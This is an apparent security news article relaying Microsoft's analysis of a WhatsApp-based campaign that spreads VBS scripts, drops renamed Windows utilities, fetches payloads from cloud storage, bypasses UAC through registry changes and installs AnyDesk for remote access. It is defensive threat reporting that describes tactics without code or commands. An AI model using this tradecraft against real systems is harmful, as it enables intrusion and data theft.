### WhatsApp as a Vector for Malware **Microsoft** is calling attention to a new campaign that has leveraged **WhatsApp** messages to distribute malicious Visual Basic Script (VBS) files. The activity, which began in late February 2026, uses these scripts to initiate a multi-stage infection chain for establishing persistence and enabling remote access. The specific lures used to trick users into executing the scripts remain unknown. ### Living-off-the-Land Tactics "The campaign relies on a combination of social engineering and living-off-the-land techniques," the **Microsoft Defender** Security Research Team said. "It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as **AWS**, **Tencent Cloud**, and **Backblaze B2**, and installs malicious **Microsoft** Installer (MSI) packages to maintain control of the system." The use of legitimate tools and trusted platforms allows threat actors to blend into normal network activity and increase the likelihood of success. ### Infection Chain The activity begins with the attackers distributing malicious VBS files via **WhatsApp** messages. When executed, these files create hidden folders in `C:\ProgramData` and drop renamed versions of legitimate Windows utilities like `curl.exe` (renamed as `netapi.dll`) and `bitsadmin.exe` (renamed as `sc.exe`).  ### Persistence and Privilege Escalation Upon gaining an initial foothold, the attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. This is achieved by downloading auxiliary VBS files hosted on **AWS S3**, **Tencent Cloud**, and **Backblaze B2** using the renamed binaries. ### UAC Bypass and MSI Deployment "Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses," **Microsoft** said. "It continuously attempts to launch `cmd.exe` with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under `HKLM\Software\Microsoft\Win`, and embedding persistence mechanisms to ensure the infection survives system reboots." These actions allow the threat actors to gain elevated privileges without user interaction via a combination of Registry manipulation with UAC bypass techniques, and ultimately deploy unsigned MSI installers. This includes legitimate tools like **AnyDesk** that provide attackers with persistent remote access, enabling them to exfiltrate data or deploy more malware. ### Sophisticated Techniques "This campaign demonstrates a sophisticated infection chain combining social engineering (**WhatsApp** delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting," **Microsoft** said.